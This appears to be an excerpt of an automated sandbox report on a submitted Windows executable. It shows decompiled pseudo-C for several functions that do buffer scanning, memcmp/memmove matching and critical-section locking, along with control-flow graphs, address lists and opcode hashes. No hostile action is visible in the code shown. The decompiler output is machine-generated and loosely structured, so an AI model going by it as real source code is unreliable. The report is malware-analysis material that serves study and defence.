												}
											}
											goto L30;
										}
										 *(_t99 - 0x20) =  *(_t99 - 0x20) + _t77;
										asm("adc dword [ebp-0x1c], 0x0");
										memmove(_t53, _t53 + _t77, 0x20);
										_t88 =  *(_t99 + 0xc);
										_t104 = _t104 + 0xc;
										continue;
									}
								}
								goto L30;
							}
						} else {
							__eflags =  *_t88 |  *(_t88 + 4);
							if(( *_t88 |  *(_t88 + 4)) != 0) {
								goto L6;
							} else {
								_t46 = 1;
							}
						}
					} else {
						_t46 = 0;
					}
				}
				L31:
				 *[fs:0x0] =  *((intOrPtr*)(_t99 - 0xc));
				return _t46;
			}
























                                                                                                                            0x0040ebb6
                                                                                                                            0x0040ebbb
                                                                                                                            0x0040ebc0
                                                                                                                            0x0040ebc8
                                                                                                                            0x0040ebcd
                                                                                                                            0x0040ebd4
                                                                                                                            0x0040ebe3
                                                                                                                            0x0040ebec
                                                                                                                            0x0040ebef
                                                                                                                            0x0040ebf1
                                                                                                                            0x0040ec02
                                                                                                                            0x0040ec02
                                                                                                                            0x0040ec07
                                                                                                                            0x0040ec0c
                                                                                                                            0x0040ec0f
                                                                                                                            0x0040ec12
                                                                                                                            0x0040ec1a
                                                                                                                            0x0040ec1f
                                                                                                                            0x0040ec23
                                                                                                                            0x0040ec26
                                                                                                                            0x0040ec26
                                                                                                                            0x0040ec26
                                                                                                                            0x0040ec2a
                                                                                                                            0x0040ec2a
                                                                                                                            0x0040ec2c
                                                                                                                            0x0040ec31
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ec38
                                                                                                                            0x0040ec38
                                                                                                                            0x0040ec3b
                                                                                                                            0x0040ec3e
                                                                                                                            0x0040ec41
                                                                                                                            0x00000000
                                                                                                                            0x0040ec43
                                                                                                                            0x0040ec43
                                                                                                                            0x0040ec45
                                                                                                                            0x00000000
                                                                                                                            0x0040ec47
                                                                                                                            0x0040ec47
                                                                                                                            0x0040ec49
                                                                                                                            0x0040ec4b
                                                                                                                            0x0040ece9
                                                                                                                            0x0040eceb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ec4b
                                                                                                                            0x0040ec45
                                                                                                                            0x0040ed27
                                                                                                                            0x0040ed2a
                                                                                                                            0x0040ed30
                                                                                                                            0x00000000
                                                                                                                            0x0040ec51
                                                                                                                            0x0040ec51
                                                                                                                            0x0040ec61
                                                                                                                            0x0040ec65
                                                                                                                            0x0040ec68
                                                                                                                            0x0040ec6b
                                                                                                                            0x0040ec6d
                                                                                                                            0x0040ed25
                                                                                                                            0x0040ed25
                                                                                                                            0x0040ec73
                                                                                                                            0x0040ec73
                                                                                                                            0x0040ec76
                                                                                                                            0x0040ec78
                                                                                                                            0x00000000
                                                                                                                            0x0040ec7a
                                                                                                                            0x0040ec7a
                                                                                                                            0x0040ec7a
                                                                                                                            0x0040ec7d
                                                                                                                            0x0040ec81
                                                                                                                            0x0040ec84
                                                                                                                            0x0040ec86
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ec88
                                                                                                                            0x0040ec88
                                                                                                                            0x0040ec88
                                                                                                                            0x0040ec8b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ec8d
                                                                                                                            0x0040ec91
                                                                                                                            0x0040eca8
                                                                                                                            0x0040ec93
                                                                                                                            0x0040ec93
                                                                                                                            0x0040ec97
                                                                                                                            0x0040ecac
                                                                                                                            0x0040ec99
                                                                                                                            0x0040ec99
                                                                                                                            0x0040ec9d
                                                                                                                            0x0040ecaf
                                                                                                                            0x0040ecaf
                                                                                                                            0x0040ec9f
                                                                                                                            0x0040ec9f
                                                                                                                            0x0040eca2
                                                                                                                            0x0040eca4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040eca6
                                                                                                                            0x0040eca4
                                                                                                                            0x0040ec9d
                                                                                                                            0x0040ec97
                                                                                                                            0x00000000
                                                                                                                            0x0040ec91
                                                                                                                            0x0040ecb2
                                                                                                                            0x0040ecb4
                                                                                                                            0x00000000
                                                                                                                            0x0040ecb6
                                                                                                                            0x0040ecba
                                                                                                                            0x0040ecbd
                                                                                                                            0x0040ecc2
                                                                                                                            0x0040ecc4
                                                                                                                            0x0040ecf5
                                                                                                                            0x0040ed02
                                                                                                                            0x0040ed05
                                                                                                                            0x0040ed08
                                                                                                                            0x0040ed11
                                                                                                                            0x0040ed16
                                                                                                                            0x0040ed16
                                                                                                                            0x0040ed1c
                                                                                                                            0x0040ed22
                                                                                                                            0x00000000
                                                                                                                            0x0040ecc6
                                                                                                                            0x0040ecc6
                                                                                                                            0x00000000
                                                                                                                            0x0040ecc6
                                                                                                                            0x0040ecc4
                                                                                                                            0x00000000
                                                                                                                            0x0040ecb4
                                                                                                                            0x0040eccb
                                                                                                                            0x0040ecd0
                                                                                                                            0x0040ecd8
                                                                                                                            0x0040ecde
                                                                                                                            0x0040ece1
                                                                                                                            0x00000000
                                                                                                                            0x0040ece1
                                                                                                                            0x0040ec78
                                                                                                                            0x00000000
                                                                                                                            0x0040ec6d
                                                                                                                            0x0040ebf3
                                                                                                                            0x0040ebf5
                                                                                                                            0x0040ebf8
                                                                                                                            0x00000000
                                                                                                                            0x0040ebfa
                                                                                                                            0x0040ebfc
                                                                                                                            0x0040ebfc
                                                                                                                            0x0040ebf8
                                                                                                                            0x0040ebe5
                                                                                                                            0x0040ebe5
                                                                                                                            0x0040ebe5
                                                                                                                            0x0040ebe3
                                                                                                                            0x0040ed32
                                                                                                                            0x0040ed38
                                                                                                                            0x0040ed40

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3519838083-0
                                                                                                                            • Opcode ID: 72ff1a0eea2013cadeca599a52519994da2caadcde6afb1cc44e6be52f4a8b55
                                                                                                                            • Instruction ID: c12524c289feaf3e84e46ecd753a7b8664c50a4f4eb467be383fba77f0e1be85
                                                                                                                            • Opcode Fuzzy Hash: 72ff1a0eea2013cadeca599a52519994da2caadcde6afb1cc44e6be52f4a8b55
                                                                                                                            • Instruction Fuzzy Hash: 8D51E071A042069BEB24DF56C885BAEB3B5FF44304F18493AE401B73C1D77DAD558B58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004019F5 Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 741 4019f5-401a30 call 418d80 call 418db0 call 4053b3 748 401b63-401b6b call 405298 741->748 749 401a36-401a3c 741->749 757 401b6d-401b7b 748->757 751 401a4a-401a53 749->751 752 401a3e-401a48 749->752 754 401a61-401a6d 751->754 755 401a55-401a5f 751->755 752->751 752->752 756 401a71-401a88 call 405410 754->756 755->754 755->755 759 401a8d-401a8f 756->759 760 401a95-401a9a 759->760 761 401b5b-401b5d 759->761 762 401aa0-401aa2 760->762 763 401b5f-401b61 760->763 764 401b4f-401b59 call 405298 761->764 766 401aa8-401aae 762->766 763->764 764->757 768 401ab0-401ab5 766->768 769 401aea-401aef 766->769 770 401b10-401b36 memmove 768->770 771 401ab7-401ac8 memcmp 768->771 769->770 772 401af1-401b02 memcmp 769->772 773 401b45-401b4c 770->773 774 401b38-401b3f 770->774 771->763 775 401ace-401ad5 771->775 776 401b04-401b0e 772->776 777 401ae6-401ae8 772->777 773->764 774->773 778 401a6f 774->778 775->748 779 401adb-401ae1 call 401b7e 775->779 776->766 777->766 778->756 779->777
                                                                                                                            C-Code - Quality: 84%
                                                                                                                            			E004019F5(void* __ecx, intOrPtr __edx, void* __eflags) {
				signed char** _t60;
				signed int _t64;
				char* _t65;
				void* _t70;
				intOrPtr _t72;
				void* _t73;
				void* _t74;
				void* _t79;
				char _t80;
				signed int _t85;
				signed int _t86;
				void* _t87;
				signed int _t97;
				int _t102;
				void* _t103;
				void* _t104;
				void* _t106;

				_t87 = __ecx;
				E00418D80(E004194A4, _t104);
				E00418DB0(0x1024, __ecx);
				_t60 =  *(_t104 + 0xc);
				_t97 = 0;
				_t60[1] = 0;
				 *( *_t60) =  *( *_t60) & 0x00000000;
				 *(_t104 - 0x1c) =  *(_t104 - 0x1c) | 0xffffffff;
				 *((intOrPtr*)(_t104 - 0x30)) = __edx;
				 *((intOrPtr*)(_t104 - 4)) = 0;
				if(E004053B3(_t87) == 0) {
					L25:
					E00405298(_t104 - 0x1c);
					_t64 = 0;
				} else {
					 *((intOrPtr*)(_t104 - 0x14)) = 0;
					if( *((char*)(__edx)) != 0) {
						do {
							 *((intOrPtr*)(_t104 - 0x14)) =  *((intOrPtr*)(_t104 - 0x14)) + 1;
						} while ( *((char*)( *((intOrPtr*)(_t104 - 0x14)) + __edx)) != 0);
					}
					_t65 =  *((intOrPtr*)(_t104 + 8));
					 *((intOrPtr*)(_t104 - 0x18)) = _t97;
					if( *_t65 != 0) {
						do {
							 *((intOrPtr*)(_t104 - 0x18)) =  *((intOrPtr*)(_t104 - 0x18)) + 1;
						} while ( *((char*)( *((intOrPtr*)(_t104 - 0x18)) + _t65)) != 0);
					}
					_t102 = 0;
					 *(_t104 - 0xd) =  *(_t104 - 0xd) & 0x00000000;
					 *((intOrPtr*)(_t104 - 0x24)) = _t97;
					 *((intOrPtr*)(_t104 - 0x20)) = _t97;
					while(1) {
						L7:
						_t70 = E00405410(_t104 - 0x1c, _t104 + _t102 - 0x1030, 0x1000 - _t102, _t104 - 0x28); // executed
						if(_t70 == 0) {
							break;
						}
						_t72 =  *((intOrPtr*)(_t104 - 0x28));
						if(_t72 == _t97) {
							L24:
							_t85 = 1;
							goto L22;
						} else {
							_t103 = _t102 + _t72;
							_t86 = _t104 - 0x1030;
							while(1) {
								_t73 = _t103;
								if( *(_t104 - 0xd) != 0) {
								}
								L11:
								_t79 = _t73 -  *((intOrPtr*)(_t104 - 0x18));
								if(_t97 > _t79) {
									L19:
									_t102 = _t103 - _t97;
									 *((intOrPtr*)(_t104 - 0x24)) =  *((intOrPtr*)(_t104 - 0x24)) + _t97;
									asm("adc dword [ebp-0x20], 0x0");
									memmove(_t104 - 0x1030, _t104 + _t97 - 0x1030, _t102);
									_t106 = _t106 + 0xc;
									if( *((intOrPtr*)(_t104 - 0x20)) > 0 ||  *((intOrPtr*)(_t104 - 0x24)) > 0x100000) {
										_t85 = _t86 & 0xffffff00 | ( *(_t104 + 0xc))[1] == 0x00000000;
										L22:
										E00405298(_t104 - 0x1c);
										_t64 = _t85;
									} else {
										_t97 = 0;
										goto L7;
									}
								} else {
									_push( *((intOrPtr*)(_t104 - 0x18)));
									_push( *((intOrPtr*)(_t104 + 8)));
									_push(_t86);
									L00418DA0();
									_t106 = _t106 + 0xc;
									if(_t79 == 0) {
										goto L24;
									} else {
										_t80 =  *_t86;
										 *((char*)(_t104 - 0x2c)) = _t80;
										if(_t80 == 0) {
											goto L25;
										} else {
											E00401B7E( *(_t104 + 0xc),  *((intOrPtr*)(_t104 - 0x2c)));
											L15:
											_t97 = _t97 + 1;
											_t86 = _t86 + 1;
											while(1) {
												_t73 = _t103;
												if( *(_t104 - 0xd) != 0) {
												}
												goto L16;
											}
											goto L11;
										}
									}
								}
								goto L26;
								L16:
								_t74 = _t73 -  *((intOrPtr*)(_t104 - 0x14));
								if(_t97 > _t74) {
									goto L19;
								} else {
									_push( *((intOrPtr*)(_t104 - 0x14)));
									_push( *((intOrPtr*)(_t104 - 0x30)));
									_push(_t86);
									L00418DA0();
									_t106 = _t106 + 0xc;
									if(_t74 != 0) {
										goto L15;
									} else {
										_t97 = _t97 +  *((intOrPtr*)(_t104 - 0x14));
										_t86 = _t86 +  *((intOrPtr*)(_t104 - 0x14));
										 *(_t104 - 0xd) = 1;
										continue;
									}
									L27:
								}
								goto L26;
							}
						}
						goto L26;
					}
					_t85 = 0;
					goto L22;
				}
				L26:
				 *[fs:0x0] =  *((intOrPtr*)(_t104 - 0xc));
				return _t64;
				goto L27;
			}




















                                                                                                                            0x004019f5
                                                                                                                            0x004019fa
                                                                                                                            0x00401a04
                                                                                                                            0x00401a09
                                                                                                                            0x00401a0f
                                                                                                                            0x00401a11
                                                                                                                            0x00401a18
                                                                                                                            0x00401a1b
                                                                                                                            0x00401a1f
                                                                                                                            0x00401a26
                                                                                                                            0x00401a30
                                                                                                                            0x00401b63
                                                                                                                            0x00401b66
                                                                                                                            0x00401b6b
                                                                                                                            0x00401a36
                                                                                                                            0x00401a39
                                                                                                                            0x00401a3c
                                                                                                                            0x00401a3e
                                                                                                                            0x00401a3e
                                                                                                                            0x00401a44
                                                                                                                            0x00401a3e
                                                                                                                            0x00401a4a
                                                                                                                            0x00401a4d
                                                                                                                            0x00401a53
                                                                                                                            0x00401a55
                                                                                                                            0x00401a55
                                                                                                                            0x00401a5b
                                                                                                                            0x00401a55
                                                                                                                            0x00401a61
                                                                                                                            0x00401a63
                                                                                                                            0x00401a67
                                                                                                                            0x00401a6a
                                                                                                                            0x00401a71
                                                                                                                            0x00401a71
                                                                                                                            0x00401a88
                                                                                                                            0x00401a8f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00401a95
                                                                                                                            0x00401a9a
                                                                                                                            0x00401b5f
                                                                                                                            0x00401b5f
                                                                                                                            0x00000000
                                                                                                                            0x00401aa0
                                                                                                                            0x00401aa0
                                                                                                                            0x00401aa2
                                                                                                                            0x00401aa8
                                                                                                                            0x00401aac
                                                                                                                            0x00401aae
                                                                                                                            0x00401aae
                                                                                                                            0x00401ab0
                                                                                                                            0x00401ab0
                                                                                                                            0x00401ab5
                                                                                                                            0x00401b10
                                                                                                                            0x00401b10
                                                                                                                            0x00401b12
                                                                                                                            0x00401b24
                                                                                                                            0x00401b29
                                                                                                                            0x00401b2f
                                                                                                                            0x00401b36
                                                                                                                            0x00401b4c
                                                                                                                            0x00401b4f
                                                                                                                            0x00401b52
                                                                                                                            0x00401b57
                                                                                                                            0x00401a6f
                                                                                                                            0x00401a6f
                                                                                                                            0x00000000
                                                                                                                            0x00401a6f
                                                                                                                            0x00401ab7
                                                                                                                            0x00401ab7
                                                                                                                            0x00401aba
                                                                                                                            0x00401abd
                                                                                                                            0x00401abe
                                                                                                                            0x00401ac3
                                                                                                                            0x00401ac8
                                                                                                                            0x00000000
                                                                                                                            0x00401ace
                                                                                                                            0x00401ace
                                                                                                                            0x00401ad2
                                                                                                                            0x00401ad5
                                                                                                                            0x00000000
                                                                                                                            0x00401adb
                                                                                                                            0x00401ae1
                                                                                                                            0x00401ae6
                                                                                                                            0x00401ae6
                                                                                                                            0x00401ae7
                                                                                                                            0x00401aa8
                                                                                                                            0x00401aac
                                                                                                                            0x00401aae
                                                                                                                            0x00401aae
                                                                                                                            0x00000000
                                                                                                                            0x00401aae
                                                                                                                            0x00000000
                                                                                                                            0x00401aa8
                                                                                                                            0x00401ad5
                                                                                                                            0x00401ac8
                                                                                                                            0x00000000
                                                                                                                            0x00401aea
                                                                                                                            0x00401aea
                                                                                                                            0x00401aef
                                                                                                                            0x00000000
                                                                                                                            0x00401af1
                                                                                                                            0x00401af1
                                                                                                                            0x00401af4
                                                                                                                            0x00401af7
                                                                                                                            0x00401af8
                                                                                                                            0x00401afd
                                                                                                                            0x00401b02
                                                                                                                            0x00000000
                                                                                                                            0x00401b04
                                                                                                                            0x00401b04
                                                                                                                            0x00401b07
                                                                                                                            0x00401b0a
                                                                                                                            0x00000000
                                                                                                                            0x00401b0a
                                                                                                                            0x00000000
                                                                                                                            0x00401b02
                                                                                                                            0x00000000
                                                                                                                            0x00401aef
                                                                                                                            0x00401aa8
                                                                                                                            0x00000000
                                                                                                                            0x00401a9a
                                                                                                                            0x00401b5b
                                                                                                                            0x00000000
                                                                                                                            0x00401b5b
                                                                                                                            0x00401b6d
                                                                                                                            0x00401b73
                                                                                                                            0x00401b7b
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcmp$H_prologmemmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1585842370-0
                                                                                                                            • Opcode ID: 53a639813324c0e6f53735f609cf536863337ed91f2060eb649b985a43864c96
                                                                                                                            • Instruction ID: 38dfcbe944138311f729fb0dfaf23ea4560b4517be3ec0a244e0583db9330822
                                                                                                                            • Opcode Fuzzy Hash: 53a639813324c0e6f53735f609cf536863337ed91f2060eb649b985a43864c96
                                                                                                                            • Instruction Fuzzy Hash: E241AC72D002499BCF11DFA4C840BEEBBB5AF45384F14416AE855772E2E3389A85CB68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040BCC7 Relevance: 4.6, APIs: 3, Instructions: 69COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 781 40bcc7-40bcf7 call 418d80 EnterCriticalSection 784 40bcf9-40bcfc 781->784 785 40bcfe-40bd0b call 406827 781->785 784->785 786 40bd22-40bd39 call 406749 784->786 787 40bd0e-40bd11 785->787 790 40bd3c-40bd5a 786->790 788 40bd61-40bd79 LeaveCriticalSection 787->788 789 40bd13-40bd1f 787->789 789->786 790->788 791 40bd5c-40bd5f 790->791 791->788
                                                                                                                            C-Code - Quality: 96%
                                                                                                                            			E0040BCC7(void* __ecx) {
				intOrPtr _t39;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr _t43;
				intOrPtr* _t45;
				void* _t46;
				intOrPtr _t50;
				intOrPtr _t56;
				signed int* _t57;
				intOrPtr _t58;
				struct _CRITICAL_SECTION* _t65;
				signed int _t68;
				void* _t71;

				E00418D80(E0041A0B8, _t71);
				_t68 =  *(_t71 + 8);
				_t65 =  *((intOrPtr*)(_t68 + 8)) + 0x18;
				 *(_t71 - 0x10) = _t65;
				EnterCriticalSection(_t65);
				_t39 =  *((intOrPtr*)(_t68 + 8));
				_t50 =  *((intOrPtr*)(_t68 + 0x10));
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				_t58 =  *((intOrPtr*)(_t68 + 0x14));
				if(_t50 !=  *((intOrPtr*)(_t39 + 0x10)) || _t58 !=  *((intOrPtr*)(_t39 + 0x14))) {
					_t40 =  *((intOrPtr*)(_t39 + 8));
					_t41 =  *((intOrPtr*)( *_t40 + 0x10))(_t40, _t50, _t58, 0, 0, _t46);
					if(_t41 != 0) {
						goto L6;
					}
					_t43 =  *((intOrPtr*)(_t68 + 8));
					 *((intOrPtr*)(_t43 + 0x10)) =  *((intOrPtr*)(_t68 + 0x10));
					 *((intOrPtr*)(_t43 + 0x14)) =  *((intOrPtr*)(_t68 + 0x14));
					goto L4;
				} else {
					L4:
					 *(_t71 + 8) =  *(_t71 + 8) & 0x00000000;
					_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 8)) + 8));
					_t41 =  *((intOrPtr*)( *_t45 + 0xc))(_t45,  *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 0x10)), _t71 + 8);
					 *((intOrPtr*)(_t68 + 0x10)) =  *((intOrPtr*)(_t68 + 0x10)) +  *(_t71 + 8);
					_t56 =  *((intOrPtr*)(_t68 + 8));
					asm("adc dword [esi+0x14], 0x0");
					 *((intOrPtr*)(_t56 + 0x10)) =  *((intOrPtr*)(_t68 + 0x10));
					 *((intOrPtr*)(_t56 + 0x14)) =  *((intOrPtr*)(_t68 + 0x14));
					_t57 =  *(_t71 + 0x14);
					if(_t57 != 0) {
						 *_t57 =  *(_t71 + 8);
					}
					L6:
					LeaveCriticalSection(_t65);
					 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
					return _t41;
				}
			}
















                                                                                                                            0x0040bccc
                                                                                                                            0x0040bcd3
                                                                                                                            0x0040bcda
                                                                                                                            0x0040bcde
                                                                                                                            0x0040bce1
                                                                                                                            0x0040bce7
                                                                                                                            0x0040bcea
                                                                                                                            0x0040bced
                                                                                                                            0x0040bcf1
                                                                                                                            0x0040bcf7
                                                                                                                            0x0040bcfe
                                                                                                                            0x0040bd0b
                                                                                                                            0x0040bd11
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040bd13
                                                                                                                            0x0040bd19
                                                                                                                            0x0040bd1f
                                                                                                                            0x00000000
                                                                                                                            0x0040bd22
                                                                                                                            0x0040bd22
                                                                                                                            0x0040bd25
                                                                                                                            0x0040bd2c
                                                                                                                            0x0040bd39
                                                                                                                            0x0040bd3f
                                                                                                                            0x0040bd42
                                                                                                                            0x0040bd45
                                                                                                                            0x0040bd4c
                                                                                                                            0x0040bd52
                                                                                                                            0x0040bd55
                                                                                                                            0x0040bd5a
                                                                                                                            0x0040bd5f
                                                                                                                            0x0040bd5f
                                                                                                                            0x0040bd61
                                                                                                                            0x0040bd64
                                                                                                                            0x0040bd71
                                                                                                                            0x0040bd79
                                                                                                                            0x0040bd79

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 0040BCCC
                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0040BCE1
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0040BD64
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterH_prologLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 367238759-0
                                                                                                                            • Opcode ID: 223f6b15eeea2771948690ca3a414ea69c75efdbba2d22d621701fa7eab4f037
                                                                                                                            • Instruction ID: 6cfa36094df7fceee4fe309223ea3ff0f653a710c7f9d26e1c3ca6cc2b4dbde7
                                                                                                                            • Opcode Fuzzy Hash: 223f6b15eeea2771948690ca3a414ea69c75efdbba2d22d621701fa7eab4f037
                                                                                                                            • Instruction Fuzzy Hash: F82128756007009FDB28CF14D884A6BB7B5FF88714F10895EE8569B7A1C774E944CBA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409DAD Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 418COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1117 409dad-409dc5 call 418d80 1120 409dc7-409dcd 1117->1120 1121 409dcf-409dd4 1117->1121 1120->1121 1122 409dd6-409ddc 1121->1122 1123 409ddf-409de4 1121->1123 1122->1123 1124 409de6-409dec 1123->1124 1125 409def-409e33 call 409944 call 40429a call 40368d call 403a5b 1123->1125 1124->1125 1137 409e45-409e5f 1125->1137 1138 409e35-409e40 call 40376e 1125->1138 1140 409e61-409e64 1137->1140 1141 409e73-409e7e 1137->1141 1138->1137 1142 409e66 1140->1142 1143 409e69-409e70 call 4031dd 1140->1143 1144 409e80-409e8c 1141->1144 1145 409e8e-409e91 1141->1145 1142->1143 1143->1141 1144->1144 1144->1145 1147 409ea1-409ea8 1145->1147 1148 409e93-409e9f 1145->1148 1150 409eab-409eb3 1147->1150 1148->1150 1151 409ed4-409edf 1150->1151 1152 409eb5-409ecf call 4088fd 1150->1152 1154 409ee5-409ef7 1151->1154 1155 409f6f-409f72 1151->1155 1161 409f99-409fa4 1152->1161 1157 409ef9-409efc 1154->1157 1158 409efe-409f10 call 4032ce 1154->1158 1159 409f74-409f7a 1155->1159 1160 409f89-409f94 1155->1160 1157->1158 1162 409f12-409f23 call 40b70b 1157->1162 1158->1162 1175 409f5e-409f69 1158->1175 1164 409f86 1159->1164 1165 409f7c-409f81 1159->1165 1160->1161 1166 409f96 1160->1166 1170 409fd1-409fe6 1161->1170 1171 409fa6-409fb6 call 406827 1161->1171 1162->1175 1181 409f25-409f33 call 409144 1162->1181 1164->1160 1168 40a16d-40a190 call 403204 * 4 1165->1168 1166->1161 1212 40a192-40a1a0 1168->1212 1173 40a166-40a168 1170->1173 1174 409fec-409ff5 1170->1174 1186 40a1a3-40a1a5 1171->1186 1187 409fbc-409fc6 call 406827 1171->1187 1173->1168 1177 40a16a-40a16c 1173->1177 1179 409ff7-409ffa 1174->1179 1180 409ffd-40a003 1174->1180 1175->1154 1175->1155 1177->1168 1179->1180 1180->1173 1184 40a009-40a01d 1180->1184 1196 409f53-409f59 call 4088fd 1181->1196 1197 409f35-409f51 call 40b406 1181->1197 1189 40a032-40a037 1184->1189 1190 40a01f-40a02c 1184->1190 1186->1168 1192 409fc9-409fcb 1187->1192 1194 40a039-40a040 call 406827 1189->1194 1195 40a04b-40a069 call 409d49 1189->1195 1190->1186 1190->1189 1192->1170 1192->1186 1205 40a043-40a045 1194->1205 1207 40a1a7-40a1b0 1195->1207 1208 40a06f-40a074 1195->1208 1196->1175 1197->1175 1205->1186 1205->1195 1213 40a1b2-40a1b4 1207->1213 1214 40a1b8-40a1bb 1207->1214 1210 40a076-40a07a 1208->1210 1211 40a07f-40a082 1208->1211 1215 40a157-40a160 1210->1215 1216 40a084-40a09c 1211->1216 1217 40a0a5-40a0bf 1211->1217 1213->1214 1214->1168 1215->1173 1215->1184 1265 40a09d call 40e520 1216->1265 1266 40a09d call 40ed82 1216->1266 1221 40a0c5-40a0da 1217->1221 1222 40a1bd-40a1c6 1217->1222 1218 40a0a0-40a0a3 1220 40a0e2-40a0f6 call 409970 1218->1220 1229 40a1f8-40a201 1220->1229 1230 40a0fc-40a100 1220->1230 1221->1220 1232 40a0dc-40a0de 1221->1232 1223 40a1c8-40a1ca 1222->1223 1224 40a1ce-40a1f6 call 403204 * 4 1222->1224 1223->1224 1224->1212 1236 40a203-40a205 1229->1236 1237 40a209-40a20c 1229->1237 1233 40a106-40a109 1230->1233 1234 40a22b-40a22e 1230->1234 1232->1220 1238 40a115 1233->1238 1239 40a10b-40a113 1233->1239 1240 40a230-40a239 1234->1240 1241 40a249-40a25c call 4063e5 1234->1241 1236->1237 1237->1168 1243 40a118-40a11b 1238->1243 1239->1238 1239->1243 1244 40a241-40a244 1240->1244 1245 40a23b-40a23d 1240->1245 1241->1168 1255 40a262-40a268 1241->1255 1248 40a146-40a14f 1243->1248 1249 40a11d-40a121 1243->1249 1244->1168 1245->1244 1248->1215 1254 40a151-40a153 1248->1254 1249->1248 1252 40a123-40a13b call 40a26d 1249->1252 1252->1248 1260 40a13d-40a140 1252->1260 1254->1215 1255->1168 1260->1248 1261 40a211-40a21a 1260->1261 1261->1177 1262 40a220-40a226 1261->1262 1262->1177 1265->1218 1266->1218
                                                                                                                            C-Code - Quality: 91%
                                                                                                                            			E00409DAD(intOrPtr* __ecx) {
				intOrPtr* _t205;
				signed int _t206;
				signed int _t207;
				signed int _t213;
				void* _t214;
				signed int _t215;
				void* _t216;
				signed int _t218;
				intOrPtr* _t219;
				signed int _t226;
				intOrPtr* _t229;
				intOrPtr* _t230;
				signed int _t232;
				signed int _t233;
				signed int _t235;
				signed int _t236;
				signed int _t242;
				signed int _t243;
				signed int _t245;
				intOrPtr* _t252;
				signed int _t256;
				void* _t257;
				signed int _t259;
				signed int _t275;
				intOrPtr* _t331;
				signed int _t334;
				void* _t336;

				E00418D80(E00419DC8, _t336);
				_t331 = __ecx;
				_t275 = 0;
				_t205 =  *__ecx;
				if(_t205 != 0) {
					 *((intOrPtr*)( *_t205 + 8))(_t205);
					 *__ecx = 0;
				}
				_t206 =  *(_t331 + 8);
